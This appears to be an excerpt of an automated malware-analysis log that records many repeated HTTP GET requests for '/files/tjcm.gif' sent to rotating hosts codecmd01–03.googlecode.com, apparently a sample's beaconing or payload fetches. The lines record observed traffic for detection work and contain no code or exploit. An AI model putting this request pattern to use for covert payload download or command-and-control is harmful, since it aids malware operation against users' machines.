                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
